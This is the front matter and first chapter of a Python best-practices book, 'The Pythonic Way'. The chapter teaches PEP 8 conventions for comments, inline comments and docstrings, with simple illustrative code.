The Pythonic Way

An Architect’s Guide to Conventions and Best Practices for the Design, Development, Testing and Management of Enterprise Python Code

Sonal Raj

www.bpbonline.com

FIRST EDITION 2022
Copyright © BPB Publications, India
ISBN: 978-93-91030-12-4

All Rights Reserved. No part of this publication may be reproduced, distributed, or transmitted in any form or by any means, or stored in a database or retrieval system, without the prior written permission of the publisher, with the exception of the program listings, which may be entered, stored, and executed in a computer system but cannot be reproduced by means of publication, photocopy, recording, or any electronic or mechanical means.

LIMITS OF LIABILITY AND DISCLAIMER OF WARRANTY

The information contained in this book is true and correct to the best of the author's and publisher's knowledge. The author has made every effort to ensure the accuracy of this publication, but the publisher cannot be held responsible for any loss or damage arising from any information in this book.

All trademarks referred to in the book are acknowledged as properties of their respective owners but BPB Publications cannot guarantee the accuracy of this information.

www.bpbonline.com

Dedicated to

My parents, Jugal and Sanjukta, All thanks to you. And to my lovely wife, Srishti, You are the light of my life.

About the Author

Sonal Raj is an Engineer, Mathematician, Data Scientist, and Python evangelist from India, who has carved a niche in the Financial Services domain. He is a Goldman Sachs and D.E.Shaw alumnus who currently heads the data analytics and research efforts for a high frequency trading firm.

Sonal holds dual masters in Computer Science and Business Management and is a former research fellow of the Indian Institute of Science. His areas of research range from image processing, real-time graph computations to electronic trading algorithms. He is a doctoral candidate in data science at the Swiss School of Business Management, Geneva. Over the years, he has implemented low latency platforms, trading strategies, and market signal models. With more than a decade of hands-on experience, he is a community speaker and also a Python and data science mentor to the newcomers in the field.

When not engrossed in reading fiction or playing symphonies on the piano, he spends far too much time watching rockets lift off.

Loving son, husband, and a custodian of his personal library.

About the Reviewer

Shubham Sharma is a Senior Remote Sensing Scientist at GeoSpoc, Bengaluru, India. For the past five years, he has been working on the utilization of Python for satellite image processing applications and has worked on related projects with the Indian Space Research Organization (ISRO). He has been a presenter at leading Python conferences such as PyCon India and has mentored at conferences such as SciPy. In addition, he conducts workshops on Python programming for satellite image processing. He enjoys Python programming, takes a great interest in the outreach of Python programming within the community, and explores the scientific frontiers through Python.

Acknowledgements

There are a few people I want to thank, without whose ideas and motivation writing this book would not have been possible. I thank my adorable wife, Srishti; her support, tolerance, and dedication have kept me going.

Thanks to my parents for always being the pillars of support, and for instilling in me, the insatiable thirst for learning. A warm thanks to my brother, Saswat and all my cousins for the inspiration, love, and humor that they bring into my life. Thanks to my friends, who have helped me in all my endeavours. This book would have been impossible without all of you.

I am eternally grateful to my colleagues and associates in the Python, Fintech, and data science communities, who constantly challenge the status quo, and make Python the powerful tool it is today. Special thanks to Travis Oliphant, the founder of NumFOCUS and Anaconda, whose work and words have helped me develop a social aspect to learning, in the few times we have interacted.

I am also grateful to the reviewer of this book, Shubham Sharma, who has provided me with valuable advice to make this book better.

Special thanks to the BPB Publications team, especially Nrip Jain, Sourabh Dwivedi, Anugraha Parthipan, Surbhi Saxena, and Shali Deeraj, for their support, advice, and assistance in creating and publishing this book.

Preface

What makes Python a great language? The idea is that it gets the “need to know” balance right. When I use the term “need to know”, I think of how the military uses the term. The intent is to achieve focus. In a military establishment, every individual needs to make frequent life-or-death choices. The more time you spend making these choices, the more likely you are choosing death. Factoring the full range of ethical considerations into every decision is very inefficient. Since no army wants to lose its own men, it delegates decision-making up through a series of ranks. By the time the individuals are in the field, the most critical decisions are already made, and the soldier has very little room to make their own decisions. They can focus on exactly what they “need to know”, trusting that their superiors have taken into account everything else that they don’t need to know.

Software libraries and abstractions are fundamentally the same. Another developer has taken the broader context into account, and has provided you – the end-developer – with only what you need to know. You get to focus on your work, trusting that the rest has been taken care of effectively. Memory management is probably the simplest example. Languages that decide how memory management is going to work (such as through a garbage collector) have taken that decision for you. You don’t need to know. You get to spend the time you would otherwise have spent thinking about deallocation on your actual tasks.

Does “need to know” ever fail? Of course, it does. Sometimes you need more context in order to make a good decision. In a military organization, there are conventions for requesting more information, ways to get promoted into positions with more context for complex decisions, and systems for refusing to follow orders or protesting. In software, “need to know” breaks down when you need some functionality that isn’t explicitly exposed or documented, when you need to debug the library or the runtime code, or when you just have to deal with something that is not behaving as it claims it should. When these situations arise, not being able to incrementally increase what you know becomes a serious blocker. A good balance of “need to know” will actively help you focus on getting your job done, while also providing the escape hatches necessary to handle the times you need to know more. Python gets this balance right. A seemingly complex technical concept in Python is tuple unpacking, but all that the user needs to know here is that they’re getting multiple return values. The fact that there’s really only a single return value, and that the unpacking is performed by the assignment, isn’t necessary or useful knowledge. Python very effectively hides unnecessary details from the users. But when “need to know” starts breaking down, Python has some of the best escape hatches in the entire software industry.

To begin with, there are truly no private members. All the code you use in your Python program belongs to you. You can read everything, mutate everything, wrap everything, proxy everything,

and nobody can stop you; because it’s your program. Duck Typing makes a heroic appearance here, enabling new ways to overcome the limiting abstractions that would be fundamentally impossible in the other languages.

Should you make a habit of doing this? Of course not! You’re using the libraries for a reason – to help you focus on your own code by delegating the “need to know” decisions to someone else. If you are going to regularly question and ignore their decisions, you ruin any advantage you may have received. However, Python allows you to rely on someone else’s code without becoming a hostage to their choices. Today, the Python ecosystem is almost entirely publicly visible code. You don’t need to know how it works, but you have the option to find out. And you can find out by following the same patterns that you’re familiar with, rather than having to learn completely new skills. Reading the Python code, or interactively inspecting the live object graphs, are exactly what you were doing with your own code.

Compare Python to the languages that tend towards sharing compiled, minified, packaged, or obfuscated code, and you’ll have a very different experience figuring out how things really (don’t) work. Compare Python to the languages that emphasize privacy, information hiding, encapsulation, and nominal typing, and you’ll have a very different experience, overcoming a broken or limiting abstraction.

People often cite Python’s ecosystem as the main reason for its popularity. Others claim the language’s simplicity or expressiveness as the primary reason. I would argue that the Python language has an incredibly well-balanced sense of what the developers need to know; better than any other language I’ve used.

Most developers get to write incredibly functional and focused code with just a few syntax constructs. Some developers produce reusable functionality that is accessible through simple syntax. A few developers manage incredible complexity to provide powerful new semantics without leaving the language. By actively helping the library developers write complex code that is not complex to use, Python has been able to build an amazing ecosystem. And that amazing ecosystem is driving the popularity of the language. The book consists of eleven chapters, in which the reader will learn not just how to code in Python, but also how to use the true Python constructs in their code.

Chapter 1 is the introductory chapter, which aims to introduce you to what is widely accepted as the ‘Pythonic’ Conventions which bring out the ease and power of Python, including the conventions for comments, docstrings, naming, code layout, and control structures among others. Chapter 2 will help understand some deeper nuances of the Pythonic data structures, where you will learn how to effectively

use data structures for time- and space-performant applications. Chapter 3 will outline how to make your Python code adhere to the object-oriented paradigm, and what some of the unique features are that Python as a language provides to enhance code reusability, modularity, and data containerization. Chapter 4 aims to introduce you to the concepts for organizing your project’s code better into encapsulated modules, making better use of imports to improve the performance of your code, and avoiding the introduction of bugs and latency with imports.

Chapter 5 will provide insights into how to effectively integrate and implement the Decorators and Context Managers in your code, and help you think through how to create safer Python code in production. Chapter 6 will be touching upon the useful data science tools, and will be diving into some of the best practices that are followed day-to-day by most data scientists to optimize, speed up, automate, and refine their processing tools and applications. Chapter 7 presents some lesser-known perspectives on Iterators, Generators, and Co-routines. Chapter 8 deals with the intricacies of the data and non-data descriptors, and helps understand how to use them for creating your own library or API.

Chapter 9 helps you understand and use design patterns to create scalable architectures, and discusses the intricacies of event-based, microservice, and API architectures.

Chapter 10 will be taking a deep dive into the test frameworks in Python and the best practices that one should follow in effectively testing the code. Chapter 11 will be discussing how to improve the quality of your work in Python, and help you ship more robust code for the production environment.

Downloading the code bundle and coloured images:

Please follow the link to download the Code Bundle and the Coloured Images of the book:

https://rebrand.ly/2c7e7b

Errata

We take immense pride in our work at BPB Publications and follow best practices to ensure the accuracy of our content and provide an engaging reading experience to our subscribers. Our readers are our mirrors, and we use their inputs to reflect on and improve upon any human errors that may have occurred during the publishing processes involved. To let us maintain the quality and help us reach out to any readers who might be having difficulties due to any unforeseen errors, please write to us at:

[email protected]

Your support, suggestions, and feedback are highly appreciated by the BPB Publications’ Family.

Did you know that BPB offers eBook versions of every book published, with PDF and ePub files available? You can upgrade to the eBook version at www.bpbonline.com and as a print book customer, you are entitled to a discount on the eBook copy. Get in touch with us at [email protected] for more details.

At www.bpbonline.com, you can also read a collection of free technical articles, sign up for a range of free newsletters, and receive exclusive discounts and offers on BPB books and eBooks.

BPB is searching for authors like you

If you're interested in becoming an author for BPB, please visit www.bpbonline.com and apply today. We have worked with thousands of developers and tech professionals, just like you, to help them share their insight with the global tech community. You can make a general application, apply for a specific hot topic that we are recruiting an author for, or submit your own idea.

The code bundle for the book is also hosted on GitHub at In case there's an update to the code, it will be updated on the existing GitHub repository.

We also have other code bundles from our rich catalog of books and videos available at Check them out!

PIRACY

If you come across any illegal copies of our works in any form on the internet, we would be grateful if you would provide us with the location address or website name. Please contact us at [email protected] with a link to the material.

If you are interested in becoming an author

If there is a topic that you have expertise in, and you are interested in either writing or contributing to a book, please visit

REVIEWS

Please leave a review. Once you have read and used this book, why not leave a review on the site that you purchased it from? Potential readers can then see and use your unbiased opinion to make purchase decisions, we at BPB can understand what you think about our products, and our authors can see your feedback on their book. Thank you! For more information about BPB, please visit

Table of Contents

1. Introduction to Pythonic Code Structure Objectives The importance of clean Python code Adding comments to your code Block comments Inline comments Writing Docstrings Using annotations Pythonic naming Code layout in Python Blank lines Maximum line length and line breaking Indentation – tabs vs. spaces Indentation following line breaks Positioning the closing braces Handling whitespaces in expressions and statements Control structures in Python Complex list comprehensions Lambda usage Should I use a generator or a list comprehension? Can we use an else with loops? Using enhanced range in Python 3 Clean Python code patterns Liberal use of assertions Where to place the commas? The ‘with’ statement for context managers Dunders, underscores, and other features

A secret about formatting strings The Zen of Python Easter egg Code quality enforcement tools Style guides for Pythonic guides Python code linters Conclusion Key takeaways Further reading

2. Pythonic Data Structures Structure Objectives Lists and array optimizations What is special about using list comprehensions? Using list comprehension instead of map() and filter() Use negative index for fast reverse access Determine iterability with all (and any) Remaining sequence using * operator Get basic typed arrays with array.array Immutable unicode character arrays with str Single byte mutable sequences with bytearray Using bytes as an immutable sequences of single bytes Creating efficient dictionaries Provide default parameters while retrieving dict values Default values using defaultdict for missing keys Simulate switch-case using dicts Dict comprehensions for optimized dict construction Maintaining key order with collections.OrderedDict Using the collections.ChainMap to make multiple dictionaries searchable

Create a read-only dict with types.MappingProxyType Ways to sort dictionaries Ways to merge dictionaries Pretty printing a Python dictionary A weird expression!? Dealing with Python sets Understand and use the mathematical set operations Set generation with comprehensions Using sets to determine common list values Eliminating duplicate elements from Iterables Creating immutable sets with frozenset Using multisets or bags with collections.Counter Tuple tricks Write clearer tuples with namedtuple Unpacking data using tuples Ignore tuple data with the ‘_’ placeholder Return multiple values from functions using tuples Namedtuples with advanced features with typing.NamedTuple Handling strings better Create a single string from list elements with ‘’.join” Enhance clarity by chaining string functions Use the format function for constructing strings Working with ASCII codes using ord and chr Other data structure trivia Creating serialized C structs with struct.Struct Attribute defaults with types.SimpleNamespace Implement speedy and robust stacks with collections.deque Implement fast and robust queues with collections.deque Parallel compute lock semantics with queue.queue Parallel compute lock semantics with queue.LifoQueue Using shared job queues using multiprocessing.Queue

Using list based binary heaps with heapq Implementing priority queues with queue.PriorityQueue Conclusion Key takeaways Further reading 3. Classes and OOP Conventions Structure Objectives Conventions for Python classes Optimal size classes Ideal structure of a class Using the @property decorator When to use static methods? Using classmethod decorator for state access Choosing between public and private Attributes Using is vs == for comparing objects super() powers in Python How to use super() effectively Search order with Method Resolution Order (MRO) Super() business advice Properties and attributes of objects Iterable objects and their creation Sequence creation Container objects Handle object attributes dynamically Callable objects More Pythonic class conventions Use __str__ for readable class representation Make use of __repr__ for representing classes Custom exception classes

Cloning Python objects Abstract base classes with abc module for inheritance Pitfalls of class vs instance variable Using self or classmethod with class’s attributes Classes are not just for encapsulation! Fetching object type using the isinstance function Data classes Creating and operating on data classes Immutable data classes Inheritance How to optimize data classes? Conclusion Key takeaways Further reading 4. Python Modules and Metaprogramming Structure Objectives Modules and packages Using __init__.py files for package interface creation Creating executable packages using __main__.py Encapsulate with modules! Using modules for organised code Type hinting and circular imports Using conditional imports with type hints Singleton nature of imports in Python Lazy imports for Python modules Features of Python module imports Can modules use characters besides English? Do Python modules need the .py extension? Can a module be available across the system?

What happens with modules having the same name? Decide which imports to expose with __all__ Python metaclasses When are metaclasses needed Validating subclasses with the __new__ method What more can you do with __slots__ ? Metaclasses for changing class behaviour Descriptors in Python Conclusion Key takeaways Further reading 5. Pythonic Decorators and Context Managers Structure Objectives Understanding Python Decorators Décoration of functions Decoration of classes Decoration of other constructs Accepting arguments in decorators Evaluation of multiple decorators Using functools library for decorators Stateful decorators Creating singletons with décorators Caching function return values – memoisation Using decorators for tracing code Writing effective decorators Preserving data about the original wrapped object Handling decorator side-effects Advantages of decorators with side-effects Create decorators that work for multiple object types

Validating JSON data Control execution rate of code Décorators and the DRY principle Separation of concerns in decorators An analysis of optimal decorators Context managers Manage resources with context managers Using contextlib for creating context managers Some practical uses of context managers Safe database access Writing tests Resource sharing in Python Remote connection protocol Conclusion Key takeaways Further reading 6. Data Processing Done Right Structure Objectives Evolution of Python for data science Using Pandas dataframes and series DataFrames creation Dataframe index with row and column index Viewing data from the Pandas Dataframe

Helper functions for Dataframe columns Using column as row index in DF Selective columns load in Pandas Dataframe Dropping rows and columns from DataFrames Mathematical operations in DataFrames Creating Pandas series

Slicing a series from a DataFrame in Pandas Series from DataFrame iterations Using series to create DataFrames Using Dicts to create DataFrames Creating DF from multiple dictsHelper Functions for Pandas Series Series iterations Pandas tips, tricks and idioms Configurations, options, and settings at startup Using Pandas’ testing module for sample data structures Using Accessor methods DatetimeIndex from component columns Using categorical data for time and space optimization Groupby objects through iteration Membership binning mapping trick Boolean operator usage in Pandas Directly load clipboard data with Pandas Store Pandas objects in a compressed format Speeding up your Pandas projects Optimize Dataframe optimizations with indexing Vectorize your Dataframe operations Optimize Dataframe multiplication Using sum() of Numpy instead of sum() of Pandas

Using percentile of Numpy, rather than quantile of Pandas for smaller arrays How to save time with Datetime data? Using .itertuples() and .iterrows() for loops Making use of Pandas’ .apply() Using .isin() to select data Improving the speed further? Sprinkle some Numpy magic Using HDFStore to avoid reprocessing

Python and CSV data processing Data cleaning with Pandas and Numpy Dropping unnecessary columns in a DataFrame Changing the index of a DataFrame Clean columns with .str() methods Element-wise dataset cleanup using the DataFrame.applymap() Skipping rows and renaming columns for CSV file data Generating random data Pseudorandom generators PRNGs for arrays – using random and Numpy urandom() in Python – CSPRNG Python 3+ secrets module Universally unique identifiers with uuid() Bonus pointers Conclusion Key takeaways Further readings

7. Iterators, Generators, and Coroutines Structure Objectives Iterators Generators are examples of Python iterators Fundamentals of iterables and sequences for loops – under the hood Iterators are iterables Python 2.x compatibility Iterator chains Creating your own iterator Improve code with lazy iterables Lazy summation

Lazy breaking out of loops Creating your own iteration helpers Differences between lazy iterable and iterables Anything that can be looped over is an iterable in Python The range object in Python 3 is not an iterator The itertools library Other common itertools features Generators Generators are simplified iterators Repeated iterations Nested loops Using generators for lazily loading infinite sequences Prefer generator expressions to list comprehensions for simple iterations Coroutines Generator interface methods The close() method The throw() method The send(value) method Can coroutines return values? Where do we use yield from? Another case of capturing returned value of generators Another case of sending and receiving values from generators Asynchronous programming Looping Gotchas Exhausting an iterator Partially consuming an iterator Unpacking is also an iteration Conclusion Key takeaways Further reading

8. Python Descriptors Structure Objectives Python descriptors Descriptor types Non-data descriptors Data descriptors The lookup chain and attribute access Descriptor objects and Python internals Property objects are data descriptors Creating a cached property with descriptors Python descriptors in methods and functions Writable data attributes How Python uses descriptors internally Functions and methods Built-in decorators for methods Slots Implementing descriptors in decorators

Best practices while using Python descriptors Descriptors are instantiated only once per class Put descriptors at the class level Accessing descriptor methods Why use Python descriptors? Lazy properties of descriptors Code in accordance to the D.R.Y. principle Conclusion Key takeaways Further reading 9. Pythonic Design and Architecture Structure

Objectives Python specific design patterns The global object pattern The prebound method pattern The sentinel object pattern Sentinel value Null pointers The null object pattern Sentinel object patterns in Python The influence of patterns over design Python application architecture Utility scripts Deployable packages and libraries Web application – Flask Web application – Django Event driven programming architecture Contrast with concurrent programming

Exploring concurrency with event loops Microservices architecture Frameworks supporting microservices in Python Why choose microservices? Pipe and filter architecture API design pointers Scaling Python applications Asynchronous programming in Python Multiprocessing Multithreading Coroutines using yield The asyncio module in Python Distributed processing using Redis Queue (RQ) Scaling Python web applications – message and task queues

Celery – a distributed task queue A celery example Running scheduled tasks with Celery Ability to postpone task execution Set up multiple Celery queues Long running tasks with Celery Application security Security architecture Common vulnerabilities Assert statements in production code Timing attacks XML parsing A polluted site-packages or import path Pickle mess-ups Using yaml.load safely

Handle requests safely Using bandit for vulnerability assessment Other Python tools for vulnerability assessment Python coding security strategies Conclusion Key takeaways Further reading 10. Effective Testing for Python Code Structure Objectives How unit tests compare with integration tests Choosing a Test Runner unittest Nose2 pytest

Structuring a simple test The SetUp and TearDown methods Writing assertions Do not forget to test side effects Web framework tests for Django and Flask applications Using the Django Test Runner Using Flask with Unittest Some advanced testing Gotchas How do we handle expected failures? How to compartmentalize behaviors in the application? How do we write integration tests? How do we test data-driven applications? Multi-environment multi-version testing Configure tox for your dependencies Executing tox Automate your test execution Working with mock objects How do we use mock objects? Types of mock objects in Python Advanced use of the Mock API Assertions on Mock objects Cautions about usage of mocks and patching Miscellaneous testing trivia flake8 based passive linting More aggressive linting with code formatters Benchmark and performance testing the code Assessing security flaws in your application Best practices and guidelines for writing effective tests Prefer using automated testing tools Using doctest for single line tests Segregate your test code from your application code

Choose the right asserts in your tests Conclusion Key takeaways Further reading 11. Production Code Management Structure Objectives Packaging Python code Structure of a Python package Configuring a package Specifying dependencies Adding additional non-Python files to the package Building the package Distributing a packaged library Configure and upload package to PyPI Register and upload to testpypi (optional) Testing your package Register and upload to PyPI Readme and licencing Creating executable packages How to Ship Python Code? Using git and pip for application deployment Using Dockers for deployment Using Twitter’s PEX for deployment Using platform specific packages – dh-virtualenv Making packaging easier – make-deb Should you use virtual environments in production? Garbage collection Viewing the refcount of an object Does Python reuse primitive type objects?

What happens with the del command? How reference counting happens in Python? Using garbage collector for reference cycles Can we deallocate objects by force? Customizing and managing garbage collection Security and cryptography Create secure password hashes Calculating a message digest What hashing algorithms are available? How do we hash files? Using pycrypto to generate RSA signatures Using pycrypto for asymmetric RSA encryption Using pycrypto for symmetric encryption How do we profile Python code? Using the %%timeit and %timeit for time profiling Profiling with cProfile Profiling using the timeit() function Using the @profile directive for line profiling code Setting up a pre-commit hook for tests and validations Working around the Global Interpreter Lock (GIL) Multiprocessing pool Using nogil for multithreading in Cython Conclusion Key takeaways Further reading Index

CHAPTER 1 Introduction to Pythonic Code

“Do the right thing. It will gratify some people and astonish the rest.”

— Mark Twain

As is the case with most programming languages, there exists a set of community-accepted guidelines and conventions, which help in the promotion of applications that are maintainable, crisp, uniform, and concise, and basically written in the way the language intended them to be written. The guidelines provide suggestions on how to create proper conventional names for classes, functions, variables, and modules, how to construct loops, and how to correctly wrap your lines in Python scripts. The term “Pythonic” is generally used in the context of programs, methods, and code blocks which adhere to these guidelines to make the best of Python’s powerful features.

Structure

This chapter will broadly cover the following topics:

Importance of clean Python code

Writing better comments, docstrings, and annotations.

Naming and code layout in Python

Control structures in Python

Clean Python code patterns

Code quality enforcement tools

Further, we aim to introduce you to what is widely accepted as ‘Pythonic’ conventions, which bring out the ease and power of the Python language.

Objectives

You will understand that, just as there is a difference between knowing how to drive and knowing how to drive a Ferrari, knowing how to best use Python is different from simply knowing how to code. The main objectives of this chapter include the following:

Understanding the common practices of writing scalable and legible code.

Using constructs like docstrings, comments, and basic tools for maintainable production codebases.

Understanding some of the lesser-known features about structuring Python code.

The importance of clean Python code

When working with Python in production, a cleanly written codebase is important for creating a maintainable and successfully managed project, thereby reducing technical debt and enabling effective agile development.

For a continuous, successful delivery of features, with a steady, constant, and predictable pace of work, it is paramount that the code base is readable, clean, and maintainable. Otherwise, every time you start working on or estimating the work for something that is a little out of the ordinary, there will be tons of refactoring involved, thereby adding to the technical debt.

All the compromises and bad decisions accumulate problems in the software. This is referred to as Technical Debt. One instance of technical debt would be problems faced today that result from decisions of the past, or historical bad code. On the other hand, taking shortcuts in the current code, without giving proper time to design or review, can lead to issues in the future. It is aptly called debt, since it will be more complicated and expensive to handle in the future than now, and even more so with passing time. The cost of technical debt can be quantified every time work is delayed because your team gets blocked on a bug fix or code restructuring. Technical debt is slow and progressive, and hence not easily identified or explicitly alarming. Hence, the underlying problem remains hidden.

PEP 8 is the standard set of conventions that we follow in Python (more discussion on that later in the chapter). It can be followed as is, or extended to suit your use case or project. These conventions already incorporate several Python syntax particulars (which you may not have encountered in other languages), and were created by the developers of the language themselves. The improvements that come with following these conventions include the following:

Consistency: With time, you get used to reading through code of a certain format. Having uniform formats of code within an organisation is of utmost importance for scalability in the long term, and for making the onboarding of new developers relatively easy. Learning and maintenance become simpler when the code layout, naming convention, and documentation, among other features, are identical across all the repositories maintained across the firm.

Greppability: Imagine a scenario where you are trying to grep for a variable. Now, the variable can occur in assignment statements, or as a named argument in function calls. If we want to differentiate between the two in order to refine our search, what options do we have?

The PEP 8 conventions say that named argument assignments should not have spaces around the operator, whereas ordinary variable assignments should have spaces around the operator. So, when searching for named arguments, you can use the following:

$ grep -nr "name=" . ./validate.py:23: name=user_name, When searching for variable assignments, you can use the following: $ grep -nr "name =" . ./validate.py:20: user_name = get_username()

This makes the search efficient. Following the conventions can make a difference and lead to higher code quality. Getting used to a structured code base gradually reduces the time taken to understand such code. Over time, you will be able to identify bugs at a glimpse and reduce the number of mistakes. It is simple muscle memory. Additionally, code quality is ensured with advanced static code analysis and repair tools, which are to be discussed later.

Uniform coding standards help an organization scale its code base, even though they may not conform to the globally accepted standards. If your organization does not have a set of well-defined conventions, it is still not late to create one.

Adding comments to your code

A clean and well-documented code base goes a long way in ensuring production reliability for any company. You reduce bugs and errors, and ensure that handing over ownership of the code base to future generations is a seamless process, and you do not have to rewrite your software every time someone leaves.

Comments should be added, preferably at the time of the initial development. Personally, I prefer to have people start their code structure with elaborate comments and then fill in the gaps with functional code. Not only does that reduce the future burden of adding documentation, it also helps in ensuring a well thought out first draft of the software.
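For instance, a minimal sketch of that comment-first approach might look like the following (the function and its steps are hypothetical, purely for illustration):

def load_and_validate_orders(csv_path):
    # Step 1: Read the raw CSV file into memory.
    # Step 2: Drop the rows with missing order IDs.
    # Step 3: Validate that every order amount is a positive number.
    # Step 4: Return the cleaned records as a list of dicts.
    pass

Each comment then becomes the anchor for a block of functional code, and most of the documentation is already in place by the time the function works.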

Some key points to keep in mind in the process of adding comments are as follows:

A maximum of 72 – 80 characters should be the limit of the comment line.

Complete sentences, with the first word capitalized, are preferred. Developers and reviewers should ensure that comments are updated when code is changed, to avoid future confusion.

Let us take a glimpse of the types of comments that are popular in Python and their nuances.

Block comments

The aggregated comments for a sub-section of the code can be documented using block comments. They can be single line or multi-line in nature, and are useful when you have to explain the specifics of a functionality or the use of a section of code – for example, the headers of a file that is being parsed, or updating the schema of a DB. They provide readers a perspective of why a fragment of code exists in the way it does. The standard PEP 8 conventions outline the following guidelines for block comment construction:

The spacing/level of the comment should match the indent level of the code that they are talking about.

Every comment line should begin with a hash (#), followed by a space, before the text starts.

Multiple paragraphs should be separated with a blank comment line, starting with a #, rather than just a blank line.

A very simple and naive example of a block comment explaining a loop functionality is noted as follows:

for counter in range(0, 100):
    # Iterate 100 times and output the value to
    # console followed by a new line character
    print(counter, '\n')

For a complex code that needs more explanation, multi-paragraph block comments are needed, which is shown as follows:

def equation_quad(a, b, c):
    # Compute the result of a quadratic equation
    # using the general quadratic formula.
    #
    # Quadratic equations result in 2 solutions,
    # res_1 and res_2.
    res_1 = (-b + (b**2 - 4*a*c)**(1/2)) / (2*a)
    res_2 = (-b - (b**2 - 4*a*c)**(1/2)) / (2*a)
    return res_1, res_2

When in doubt about which comment type to use, choose block. Use it generously for all non-trivial code in the application, and do not forget to update them when working on the code.

Inline comments

Inline comments may syntactically look like the block comments in Python; however, their purpose is different. They are used to convey information about a single line of code, usually as a note, reminder, warning, or a heads-up regarding whatever is being done in that line of code. It ensures that developers working on that line in the future are not confused with any hidden logic, rationales, or agenda. Let us look at what PEP8 conventions have to say about the inline comments:

Use inline comments only if necessary, else avoid.

They should be at the end of the same line as the code they refer to.

There should be at least two spaces between the code and the comment for readability.

Similar to block comments, start inline comments with a # and a single space thereafter. Avoid over explanation of obvious logic with inline comments.

A Pythonic inline comment in action looks like the following:

variable = 50 # This is a random number variable

When we say avoid explaining the obvious, we also include situations where better variable names can do the job for you:

x = 'Nicola Tesla' # Name of Student

Do not waste an inline comment on this. Rather, christen it with a better name:

name_of_student = 'Nicola Tesla'

Then, there are the obvious comments, which many developers have a habit of using, like the following:

list_variable = []  # Initialize an empty list
var_name = 50  # Initialize the variable
var_name = var_name * 20  # Multiply variable by 20

We know it, John! If you have entrusted us to review your code, hopefully, we can understand the syntax without inline comments!

Inline comments have very specific use cases, and frequent misuse of inline comments can lead to an absolutely confusing and cluttered code base. My advice is to stick to block comments, with which you will increase the chances of keeping your code PEP 8 compliant.

Writing Docstrings

Documentation strings, or in short docstrings, are Python string literals that are wrapped in a triad of single (‘‘‘) or double (“““) quotes and written on the starting line of a Python class, module, method, or function. Their purpose is to explain the use or operation of a specific construct. PEP 257 is completely dedicated to explaining the docstring protocols and usages. In this section, we will be looking at the key pointers to keep in mind while using docstrings. Docstrings are simply string literals. You can place them anywhere in your code for logic or functionality documentation. However, docstrings are not comments. So, what is the difference here?

I still find engineers using docstrings to add comments in the code, just because it makes multi-line comments easier. Do not give in to that temptation. Your actions could lead to some random comment getting parsed by an automated software documentation tool and confusing others.

The subtle difference is that documentation is used for explanation, rather than justification. Docstrings do not represent comments, rather they represent the documentation of a particular

component. Using docstrings is not just widely accepted, it is also encouraged for good quality code.

Conventionally, too many comments are frowned upon for several reasons. Firstly, if you need an extensive comment to explain why and how something is being done, then your code is possibly sub-standard. Code should be self-explanatory. Secondly, comments can be misleading sometimes. Having an incorrect explanation in comments can be more disastrous than having no comments at all. Therefore, if someone forgets to update the comments in the code when they update the code, then they’ve just created a landmine. Sometimes, we cannot avoid using comments. Maybe there is an error in a third-party library that has to be circumvented. In those cases, placing a small but descriptive comment might be acceptable. With docstrings, however, the story is different as we’ve discussed earlier. Hence, it is a good practice to add higher-level docstrings for a component overview. The dynamic typing feature in Python makes the use of docstrings important. Say, you write a function which takes a generic input or any value type for its argument – the interpreter will not enforce a type here. Maintaining such a function would be especially difficult if you do not know how the types need to be handled, or how they are supposed to be used.

This is where docstrings shine. Documenting the expected input parameters and types, and return types is a common practice to

write robust Python code, which helps in understanding the working of the application better. Let us take an example of a docstring from the standard Python library:

In [1]: dict.update?
Docstring:
D.update([E, ]**F) -> None.  Update D from dict/iterable E and F.
If E is present and has a .keys() method, then does:  for k in E: D[k] = E[k]
If E is present and lacks a .keys() method, then does:  for k, v in E: D[k] = v
In either case, this is followed by: for k in F:  D[k] = F[k]
Type: method_descriptor

This documentation on updating dictionaries provides helpful information and expresses that the update method can be used in different ways:

The original dictionary contents can be updated with the keys from an object that is passed to the method (which can be another data structure having a keys() method; e.g. another dictionary).

>>> d = {}
>>> d.update({3: "three", 2: "two"})
>>> d
{3: 'three', 2: 'two'}

An iterable can be passed, having pairs of keys and values, which will be used to update the original dictionary contents.

>>> d.update([(1, "one"), (4, "four")])
>>> d
{1: 'one', 2: 'two', 3: 'three', 4: 'four'}

In situations like these, docstrings are useful for learning and understanding how the function works.

In the preceding example, we obtained the docstring of the function by using the question mark on it (dict.update?). This is a feature of the IPython (or currently Jupyter) interactive interpreter. A double question mark (??) can also be used, and in some cases you can retrieve more information.
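To apply the same idea to your own code, here is an illustrative sketch of a function whose docstring documents the expected parameter types and the return type (the function and the docstring layout are examples, not a format prescribed by this book):

def convert_temperature(value, unit="celsius"):
    """Convert a temperature reading to kelvin.

    Args:
        value (float): The temperature reading to convert.
        unit (str): Unit of the reading, either "celsius" or
            "fahrenheit". Defaults to "celsius".

    Returns:
        float: The temperature expressed in kelvin.

    Raises:
        ValueError: If `unit` is not a supported unit.
    """
    if unit == "celsius":
        return value + 273.15
    if unit == "fahrenheit":
        return (value - 32) * 5 / 9 + 273.15
    raise ValueError("Unsupported unit: " + unit)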

Another difference to note between comments and docstrings is that comments are ignored during execution, whereas the interpreter processes docstrings. Docstrings are part of the application code, and Python exposes them with the help of the __doc__ attribute on the object.

>>> def delta_method():
...     """A random generic documentation"""
...     return None
...
>>> delta_method.__doc__
'A random generic documentation'

Once this is programmatically exposed, it is possible to access the docstrings during runtime and enable the generation of consolidated documentation from the source code base. There are several tools that can use this feature to generate beautiful documentation for you. Sphinx is one such popular documentation generator. It uses the autodoc extension to parse the docstrings from your code and convert them into documentation pages in HTML. These can then be packaged or published for the users of the program to create a user manual without any additional effort. For publicly available projects, this can be automated using Read the Docs, which will trigger builds of the documentation from a repository or a branch. For sensitive projects in the organisation, an on-premise configuration of the tool should be used so that access can be controlled. However, it has to be ensured that the documentation is updated with every associated code change.
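As a minimal sketch, assuming a conventional Sphinx project layout (the project name and path below are placeholders), enabling autodoc in conf.py looks roughly like this:

# conf.py -- minimal Sphinx configuration for docstring-based documentation
import os
import sys

# Make the package importable so autodoc can locate it.
sys.path.insert(0, os.path.abspath(".."))

project = "my_project"        # placeholder project name
extensions = [
    "sphinx.ext.autodoc",     # pull API documentation out of docstrings
]

Running sphinx-build over the documentation source then renders the collected docstrings into HTML pages.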

Maintaining detailed and updated documentation is a challenge in software engineering. If you intend your project to be understood and read by other humans, you have to put in the manual effort to document your code. The key is to understand that software is not just about code. The documentation that comes with it is also part of the deliverable. Therefore, when someone is updating a function, it is equally critical to update the corresponding part of the documentation to

the code that was just changed, regardless of whether it is a wiki, a user manual, a README file, or several docstrings.

Note that comments are ignored during execution, whereas the interpreter processes docstrings.

Using annotations

